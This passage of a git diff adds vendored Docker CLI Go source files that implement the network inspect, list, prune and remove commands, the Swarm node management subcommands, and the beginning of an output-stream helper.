--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/inspect.go
@@ -0,0 +1,45 @@
+package network
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	"github.com/spf13/cobra"
+)
+
+type inspectOptions struct {
+	format string
+	names  []string
+}
+
+func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] NETWORK [NETWORK...]",
+		Short: "Display detailed information on one or more networks",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.names = args
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+
+	ctx := context.Background()
+
+	getNetFunc := func(name string) (interface{}, []byte, error) {
+		return client.NetworkInspectWithRaw(ctx, name)
+	}
+
+	return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getNetFunc)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/list.go b/vendor/github.com/docker/docker/cli/command/network/list.go
new file mode 100644
index 0000000000..1a5d285103
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/list.go
@@ -0,0 +1,76 @@
+package network
+
+import (
+	"sort"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+)
+
+type byNetworkName []types.NetworkResource
+
+func (r byNetworkName) Len() int           { return len(r) }
+func (r byNetworkName) Swap(i, j int)      { r[i], r[j] = r[j], r[i] }
+func (r byNetworkName) Less(i, j int) bool { return r[i].Name < r[j].Name }
+
+type listOptions struct {
+	quiet   bool
+	noTrunc bool
+	format  string
+	filter  opts.FilterOpt
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := listOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:     "ls [OPTIONS]",
+		Aliases: []string{"list"},
+		Short:   "List networks",
+		Args:    cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runList(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display network IDs")
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate the output")
+	flags.StringVar(&opts.format, "format", "", "Pretty-print networks using a Go template")
+	flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'driver=bridge')")
+
+	return cmd
+}
+
+func runList(dockerCli *command.DockerCli, opts listOptions) error {
+	client := dockerCli.Client()
+	options := types.NetworkListOptions{Filters: opts.filter.Value()}
+	networkResources, err := client.NetworkList(context.Background(), options)
+	if err != nil {
+		return err
+	}
+
+	format := opts.format
+	if len(format) == 0 {
+		if len(dockerCli.ConfigFile().NetworksFormat) > 0 && !opts.quiet {
+			format = dockerCli.ConfigFile().NetworksFormat
+		} else {
+			format = formatter.TableFormatKey
+		}
+	}
+
+	sort.Sort(byNetworkName(networkResources))
+
+	networksCtx := formatter.Context{
+		Output: dockerCli.Out(),
+		Format: formatter.NewNetworkFormat(format, opts.quiet),
+		Trunc:  !opts.noTrunc,
+	}
+	return formatter.NetworkWrite(networksCtx, networkResources)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/prune.go b/vendor/github.com/docker/docker/cli/command/network/prune.go
new file mode 100644
index 0000000000..9f1979e6b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/prune.go
@@ -0,0 +1,73 @@
+package network
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type pruneOptions struct {
+	force bool
+}
+
+// NewPruneCommand returns a new cobra prune command for networks
+func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts pruneOptions
+
+	cmd := &cobra.Command{
+		Use:   "prune [OPTIONS]",
+		Short: "Remove all unused networks",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			output, err := runPrune(dockerCli, opts)
+			if err != nil {
+				return err
+			}
+			if output != "" {
+				fmt.Fprintln(dockerCli.Out(), output)
+			}
+			return nil
+		},
+		Tags: map[string]string{"version": "1.25"},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
+
+	return cmd
+}
+
+const warning = `WARNING! This will remove all networks not used by at least one container.
+Are you sure you want to continue?`
+
+func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (output string, err error) {
+	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
+		return
+	}
+
+	report, err := dockerCli.Client().NetworksPrune(context.Background(), filters.Args{})
+	if err != nil {
+		return
+	}
+
+	if len(report.NetworksDeleted) > 0 {
+		output = "Deleted Networks:\n"
+		for _, id := range report.NetworksDeleted {
+			output += id + "\n"
+		}
+	}
+
+	return
+}
+
+// RunPrune calls the Network Prune API
+// This returns the amount of space reclaimed and a detailed output string
+func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) {
+	output, err := runPrune(dockerCli, pruneOptions{force: true})
+	return 0, output, err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/remove.go b/vendor/github.com/docker/docker/cli/command/network/remove.go
new file mode 100644
index 0000000000..2034b8709e
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/remove.go
@@ -0,0 +1,43 @@
+package network
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return &cobra.Command{
+		Use:     "rm NETWORK [NETWORK...]",
+		Aliases: []string{"remove"},
+		Short:   "Remove one or more networks",
+		Args:    cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runRemove(dockerCli, args)
+		},
+	}
+}
+
+func runRemove(dockerCli *command.DockerCli, networks []string) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+	status := 0
+
+	for _, name := range networks {
+		if err := client.NetworkRemove(ctx, name); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "%s\n", err)
+			status = 1
+			continue
+		}
+		fmt.Fprintf(dockerCli.Out(), "%s\n", name)
+	}
+
+	if status != 0 {
+		return cli.StatusError{StatusCode: status}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/cmd.go b/vendor/github.com/docker/docker/cli/command/node/cmd.go
new file mode 100644
index 0000000000..e71b9199ad
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/cmd.go
@@ -0,0 +1,43 @@
+package node
+
+import (
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	apiclient "github.com/docker/docker/client"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+// NewNodeCommand returns a cobra command for `node` subcommands
+func NewNodeCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "node",
+		Short: "Manage Swarm nodes",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		newDemoteCommand(dockerCli),
+		newInspectCommand(dockerCli),
+		newListCommand(dockerCli),
+		newPromoteCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+		newPsCommand(dockerCli),
+		newUpdateCommand(dockerCli),
+	)
+	return cmd
+}
+
+// Reference returns the reference of a node. The special value "self" for a node
+// reference is mapped to the current node, hence the node ID is retrieved using
+// the `/info` endpoint.
+func Reference(ctx context.Context, client apiclient.APIClient, ref string) (string, error) {
+	if ref == "self" {
+		info, err := client.Info(ctx)
+		if err != nil {
+			return "", err
+		}
+		return info.Swarm.NodeID, nil
+	}
+	return ref, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/demote.go b/vendor/github.com/docker/docker/cli/command/node/demote.go
new file mode 100644
index 0000000000..33f86c6499
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/demote.go
@@ -0,0 +1,36 @@
+package node
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+func newDemoteCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return &cobra.Command{
+		Use:   "demote NODE [NODE...]",
+		Short: "Demote one or more nodes from manager in the swarm",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runDemote(dockerCli, args)
+		},
+	}
+}
+
+func runDemote(dockerCli *command.DockerCli, nodes []string) error {
+	demote := func(node *swarm.Node) error {
+		if node.Spec.Role == swarm.NodeRoleWorker {
+			fmt.Fprintf(dockerCli.Out(), "Node %s is already a worker.\n", node.ID)
+			return errNoRoleChange
+		}
+		node.Spec.Role = swarm.NodeRoleWorker
+		return nil
+	}
+	success := func(nodeID string) {
+		fmt.Fprintf(dockerCli.Out(), "Manager %s demoted in the swarm.\n", nodeID)
+	}
+	return updateNodes(dockerCli, nodes, demote, success)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/inspect.go b/vendor/github.com/docker/docker/cli/command/node/inspect.go
new file mode 100644
index 0000000000..fde70185f8
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/inspect.go
@@ -0,0 +1,144 @@
+package node
+
+import (
+	"fmt"
+	"io"
+	"sort"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/go-units"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type inspectOptions struct {
+	nodeIds []string
+	format  string
+	pretty  bool
+}
+
+func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] self|NODE [NODE...]",
+		Short: "Display detailed information on one or more nodes",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.nodeIds = args
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+	flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.")
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+	getRef := func(ref string) (interface{}, []byte, error) {
+		nodeRef, err := Reference(ctx, client, ref)
+		if err != nil {
+			return nil, nil, err
+		}
+		node, _, err := client.NodeInspectWithRaw(ctx, nodeRef)
+		return node, nil, err
+	}
+
+	if !opts.pretty {
+		return inspect.Inspect(dockerCli.Out(), opts.nodeIds, opts.format, getRef)
+	}
+	return printHumanFriendly(dockerCli.Out(), opts.nodeIds, getRef)
+}
+
+func printHumanFriendly(out io.Writer, refs []string, getRef inspect.GetRefFunc) error {
+	for idx, ref := range refs {
+		obj, _, err := getRef(ref)
+		if err != nil {
+			return err
+		}
+		printNode(out, obj.(swarm.Node))
+
+		// TODO: better way to do this?
+		// print extra space between objects, but not after the last one
+		if idx+1 != len(refs) {
+			fmt.Fprintf(out, "\n\n")
+		} else {
+			fmt.Fprintf(out, "\n")
+		}
+	}
+	return nil
+}
+
+// TODO: use a template
+func printNode(out io.Writer, node swarm.Node) {
+	fmt.Fprintf(out, "ID:\t\t\t%s\n", node.ID)
+	ioutils.FprintfIfNotEmpty(out, "Name:\t\t\t%s\n", node.Spec.Name)
+	if node.Spec.Labels != nil {
+		fmt.Fprintln(out, "Labels:")
+		for k, v := range node.Spec.Labels {
+			fmt.Fprintf(out, " - %s = %s\n", k, v)
+		}
+	}
+
+	ioutils.FprintfIfNotEmpty(out, "Hostname:\t\t%s\n", node.Description.Hostname)
+	fmt.Fprintf(out, "Joined at:\t\t%s\n", command.PrettyPrint(node.CreatedAt))
+	fmt.Fprintln(out, "Status:")
+	fmt.Fprintf(out, " State:\t\t\t%s\n", command.PrettyPrint(node.Status.State))
+	ioutils.FprintfIfNotEmpty(out, " Message:\t\t%s\n", command.PrettyPrint(node.Status.Message))
+	fmt.Fprintf(out, " Availability:\t\t%s\n", command.PrettyPrint(node.Spec.Availability))
+	ioutils.FprintfIfNotEmpty(out, " Address:\t\t%s\n", command.PrettyPrint(node.Status.Addr))
+
+	if node.ManagerStatus != nil {
+		fmt.Fprintln(out, "Manager Status:")
+		fmt.Fprintf(out, " Address:\t\t%s\n", node.ManagerStatus.Addr)
+		fmt.Fprintf(out, " Raft Status:\t\t%s\n", command.PrettyPrint(node.ManagerStatus.Reachability))
+		leader := "No"
+		if node.ManagerStatus.Leader {
+			leader = "Yes"
+		}
+		fmt.Fprintf(out, " Leader:\t\t%s\n", leader)
+	}
+
+	fmt.Fprintln(out, "Platform:")
+	fmt.Fprintf(out, " Operating System:\t%s\n", node.Description.Platform.OS)
+	fmt.Fprintf(out, " Architecture:\t\t%s\n", node.Description.Platform.Architecture)
+
+	fmt.Fprintln(out, "Resources:")
+	fmt.Fprintf(out, " CPUs:\t\t\t%d\n", node.Description.Resources.NanoCPUs/1e9)
+	fmt.Fprintf(out, " Memory:\t\t%s\n", units.BytesSize(float64(node.Description.Resources.MemoryBytes)))
+
+	var pluginTypes []string
+	pluginNamesByType := map[string][]string{}
+	for _, p := range node.Description.Engine.Plugins {
+		// append to pluginTypes only if not done previously
+		if _, ok := pluginNamesByType[p.Type]; !ok {
+			pluginTypes = append(pluginTypes, p.Type)
+		}
+		pluginNamesByType[p.Type] = append(pluginNamesByType[p.Type], p.Name)
+	}
+
+	if len(pluginTypes) > 0 {
+		fmt.Fprintln(out, "Plugins:")
+		sort.Strings(pluginTypes) // ensure stable output
+		for _, pluginType := range pluginTypes {
+			fmt.Fprintf(out, "  %s:\t\t%s\n", pluginType, strings.Join(pluginNamesByType[pluginType], ", "))
+		}
+	}
+	fmt.Fprintf(out, "Engine Version:\t\t%s\n", node.Description.Engine.EngineVersion)
+
+	if len(node.Description.Engine.Labels) != 0 {
+		fmt.Fprintln(out, "Engine Labels:")
+		for k, v := range node.Description.Engine.Labels {
+			fmt.Fprintf(out, " - %s = %s\n", k, v)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/list.go b/vendor/github.com/docker/docker/cli/command/node/list.go
new file mode 100644
index 0000000000..9cacdcf441
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/list.go
@@ -0,0 +1,115 @@
+package node
+
+import (
+	"fmt"
+	"io"
+	"text/tabwriter"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+)
+
+const (
+	listItemFmt = "%s\t%s\t%s\t%s\t%s\n"
+)
+
+type listOptions struct {
+	quiet  bool
+	filter opts.FilterOpt
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := listOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:     "ls [OPTIONS]",
+		Aliases: []string{"list"},
+		Short:   "List nodes in the swarm",
+		Args:    cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runList(dockerCli, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func runList(dockerCli *command.DockerCli, opts listOptions) error {
+	client := dockerCli.Client()
+	out := dockerCli.Out()
+	ctx := context.Background()
+
+	nodes, err := client.NodeList(
+		ctx,
+		types.NodeListOptions{Filters: opts.filter.Value()})
+	if err != nil {
+		return err
+	}
+
+	if len(nodes) > 0 && !opts.quiet {
+		// only non-empty nodes and not quiet, should we call /info api
+		info, err := client.Info(ctx)
+		if err != nil {
+			return err
+		}
+		printTable(out, nodes, info)
+	} else if !opts.quiet {
+		// no nodes and not quiet, print only one line with columns ID, HOSTNAME, ...
+		printTable(out, nodes, types.Info{})
+	} else {
+		printQuiet(out, nodes)
+	}
+
+	return nil
+}
+
+func printTable(out io.Writer, nodes []swarm.Node, info types.Info) {
+	writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0)
+
+	// Ignore flushing errors
+	defer writer.Flush()
+
+	fmt.Fprintf(writer, listItemFmt, "ID", "HOSTNAME", "STATUS", "AVAILABILITY", "MANAGER STATUS")
+	for _, node := range nodes {
+		name := node.Description.Hostname
+		availability := string(node.Spec.Availability)
+
+		reachability := ""
+		if node.ManagerStatus != nil {
+			if node.ManagerStatus.Leader {
+				reachability = "Leader"
+			} else {
+				reachability = string(node.ManagerStatus.Reachability)
+			}
+		}
+
+		ID := node.ID
+		if node.ID == info.Swarm.NodeID {
+			ID = ID + " *"
+		}
+
+		fmt.Fprintf(
+			writer,
+			listItemFmt,
+			ID,
+			name,
+			command.PrettyPrint(string(node.Status.State)),
+			command.PrettyPrint(availability),
+			command.PrettyPrint(reachability))
+	}
+}
+
+func printQuiet(out io.Writer, nodes []swarm.Node) {
+	for _, node := range nodes {
+		fmt.Fprintln(out, node.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/opts.go b/vendor/github.com/docker/docker/cli/command/node/opts.go
new file mode 100644
index 0000000000..7e6c55d487
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/opts.go
@@ -0,0 +1,60 @@
+package node
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+)
+
+type nodeOptions struct {
+	annotations
+	role         string
+	availability string
+}
+
+type annotations struct {
+	name   string
+	labels opts.ListOpts
+}
+
+func newNodeOptions() *nodeOptions {
+	return &nodeOptions{
+		annotations: annotations{
+			labels: opts.NewListOpts(nil),
+		},
+	}
+}
+
+func (opts *nodeOptions) ToNodeSpec() (swarm.NodeSpec, error) {
+	var spec swarm.NodeSpec
+
+	spec.Annotations.Name = opts.annotations.name
+	spec.Annotations.Labels = runconfigopts.ConvertKVStringsToMap(opts.annotations.labels.GetAll())
+
+	switch swarm.NodeRole(strings.ToLower(opts.role)) {
+	case swarm.NodeRoleWorker:
+		spec.Role = swarm.NodeRoleWorker
+	case swarm.NodeRoleManager:
+		spec.Role = swarm.NodeRoleManager
+	case "":
+	default:
+		return swarm.NodeSpec{}, fmt.Errorf("invalid role %q, only worker and manager are supported", opts.role)
+	}
+
+	switch swarm.NodeAvailability(strings.ToLower(opts.availability)) {
+	case swarm.NodeAvailabilityActive:
+		spec.Availability = swarm.NodeAvailabilityActive
+	case swarm.NodeAvailabilityPause:
+		spec.Availability = swarm.NodeAvailabilityPause
+	case swarm.NodeAvailabilityDrain:
+		spec.Availability = swarm.NodeAvailabilityDrain
+	case "":
+	default:
+		return swarm.NodeSpec{}, fmt.Errorf("invalid availability %q, only active, pause and drain are supported", opts.availability)
+	}
+
+	return spec, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/promote.go b/vendor/github.com/docker/docker/cli/command/node/promote.go
new file mode 100644
index 0000000000..f47d783f4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/promote.go
@@ -0,0 +1,36 @@
+package node
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+func newPromoteCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return &cobra.Command{
+		Use:   "promote NODE [NODE...]",
+		Short: "Promote one or more nodes to manager in the swarm",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runPromote(dockerCli, args)
+		},
+	}
+}
+
+func runPromote(dockerCli *command.DockerCli, nodes []string) error {
+	promote := func(node *swarm.Node) error {
+		if node.Spec.Role == swarm.NodeRoleManager {
+			fmt.Fprintf(dockerCli.Out(), "Node %s is already a manager.\n", node.ID)
+			return errNoRoleChange
+		}
+		node.Spec.Role = swarm.NodeRoleManager
+		return nil
+	}
+	success := func(nodeID string) {
+		fmt.Fprintf(dockerCli.Out(), "Node %s promoted to a manager in the swarm.\n", nodeID)
+	}
+	return updateNodes(dockerCli, nodes, promote, success)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/ps.go b/vendor/github.com/docker/docker/cli/command/node/ps.go
new file mode 100644
index 0000000000..a034721d24
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/ps.go
@@ -0,0 +1,93 @@
+package node
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/idresolver"
+	"github.com/docker/docker/cli/command/task"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type psOptions struct {
+	nodeIDs   []string
+	noResolve bool
+	noTrunc   bool
+	filter    opts.FilterOpt
+}
+
+func newPsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := psOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "ps [OPTIONS] [NODE...]",
+		Short: "List tasks running on one or more nodes, defaults to current node",
+		Args:  cli.RequiresMinArgs(0),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.nodeIDs = []string{"self"}
+
+			if len(args) != 0 {
+				opts.nodeIDs = args
+			}
+
+			return runPs(dockerCli, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output")
+	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func runPs(dockerCli *command.DockerCli, opts psOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	var (
+		errs  []string
+		tasks []swarm.Task
+	)
+
+	for _, nodeID := range opts.nodeIDs {
+		nodeRef, err := Reference(ctx, client, nodeID)
+		if err != nil {
+			errs = append(errs, err.Error())
+			continue
+		}
+
+		node, _, err := client.NodeInspectWithRaw(ctx, nodeRef)
+		if err != nil {
+			errs = append(errs, err.Error())
+			continue
+		}
+
+		filter := opts.filter.Value()
+		filter.Add("node", node.ID)
+
+		nodeTasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter})
+		if err != nil {
+			errs = append(errs, err.Error())
+			continue
+		}
+
+		tasks = append(tasks, nodeTasks...)
+	}
+
+	if err := task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc); err != nil {
+		errs = append(errs, err.Error())
+	}
+
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/remove.go b/vendor/github.com/docker/docker/cli/command/node/remove.go
new file mode 100644
index 0000000000..19b4a96631
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/remove.go
@@ -0,0 +1,56 @@
+package node
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type removeOptions struct {
+	force bool
+}
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := removeOptions{}
+
+	cmd := &cobra.Command{
+		Use:     "rm [OPTIONS] NODE [NODE...]",
+		Aliases: []string{"remove"},
+		Short:   "Remove one or more nodes from the swarm",
+		Args:    cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runRemove(dockerCli, args, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Force remove a node from the swarm")
+	return cmd
+}
+
+func runRemove(dockerCli *command.DockerCli, args []string, opts removeOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	var errs []string
+
+	for _, nodeID := range args {
+		err := client.NodeRemove(ctx, nodeID, types.NodeRemoveOptions{Force: opts.force})
+		if err != nil {
+			errs = append(errs, err.Error())
+			continue
+		}
+		fmt.Fprintf(dockerCli.Out(), "%s\n", nodeID)
+	}
+
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/node/update.go b/vendor/github.com/docker/docker/cli/command/node/update.go
new file mode 100644
index 0000000000..65339e138b
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/node/update.go
@@ -0,0 +1,121 @@
+package node
+
+import (
+	"errors"
+	"fmt"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+	"golang.org/x/net/context"
+)
+
+var (
+	errNoRoleChange = errors.New("role was already set to the requested value")
+)
+
+func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	nodeOpts := newNodeOptions()
+
+	cmd := &cobra.Command{
+		Use:   "update [OPTIONS] NODE",
+		Short: "Update a node",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runUpdate(dockerCli, cmd.Flags(), args[0])
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVar(&nodeOpts.role, flagRole, "", "Role of the node (worker/manager)")
+	flags.StringVar(&nodeOpts.availability, flagAvailability, "", "Availability of the node (active/pause/drain)")
+	flags.Var(&nodeOpts.annotations.labels, flagLabelAdd, "Add or update a node label (key=value)")
+	labelKeys := opts.NewListOpts(nil)
+	flags.Var(&labelKeys, flagLabelRemove, "Remove a node label if exists")
+	return cmd
+}
+
+func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, nodeID string) error {
+	success := func(_ string) {
+		fmt.Fprintln(dockerCli.Out(), nodeID)
+	}
+	return updateNodes(dockerCli, []string{nodeID}, mergeNodeUpdate(flags), success)
+}
+
+func updateNodes(dockerCli *command.DockerCli, nodes []string, mergeNode func(node *swarm.Node) error, success func(nodeID string)) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	for _, nodeID := range nodes {
+		node, _, err := client.NodeInspectWithRaw(ctx, nodeID)
+		if err != nil {
+			return err
+		}
+
+		err = mergeNode(&node)
+		if err != nil {
+			if err == errNoRoleChange {
+				continue
+			}
+			return err
+		}
+		err = client.NodeUpdate(ctx, node.ID, node.Version, node.Spec)
+		if err != nil {
+			return err
+		}
+		success(nodeID)
+	}
+	return nil
+}
+
+func mergeNodeUpdate(flags *pflag.FlagSet) func(*swarm.Node) error {
+	return func(node *swarm.Node) error {
+		spec := &node.Spec
+
+		if flags.Changed(flagRole) {
+			str, err := flags.GetString(flagRole)
+			if err != nil {
+				return err
+			}
+			spec.Role = swarm.NodeRole(str)
+		}
+		if flags.Changed(flagAvailability) {
+			str, err := flags.GetString(flagAvailability)
+			if err != nil {
+				return err
+			}
+			spec.Availability = swarm.NodeAvailability(str)
+		}
+		if spec.Annotations.Labels == nil {
+			spec.Annotations.Labels = make(map[string]string)
+		}
+		if flags.Changed(flagLabelAdd) {
+			labels := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll()
+			for k, v := range runconfigopts.ConvertKVStringsToMap(labels) {
+				spec.Annotations.Labels[k] = v
+			}
+		}
+		if flags.Changed(flagLabelRemove) {
+			keys := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll()
+			for _, k := range keys {
+				// if a key doesn't exist, fail the command explicitly
+				if _, exists := spec.Annotations.Labels[k]; !exists {
+					return fmt.Errorf("key %s doesn't exist in node's labels", k)
+				}
+				delete(spec.Annotations.Labels, k)
+			}
+		}
+		return nil
+	}
+}
+
+const (
+	flagRole         = "role"
+	flagAvailability = "availability"
+	flagLabelAdd     = "label-add"
+	flagLabelRemove  = "label-rm"
+)
diff --git a/vendor/github.com/docker/docker/cli/command/out.go b/vendor/github.com/docker/docker/cli/command/out.go
new file mode 100644
index 0000000000..85718d7acd
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/out.go
@@ -0,0 +1,69 @@
+package command
+
+import (
+	"io"
+	"os"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/term"
+)
+
+// OutStream is an output stream used by the DockerCli to write normal program
+// output.
+type OutStream struct {
+	out        io.Writer
+	fd         uintptr
+	isTerminal bool
+	state      *term.State
+}
+
+func (o *OutStream) Write(p []byte) (int, error) {
+	return o.out.Write(p)
+}
+
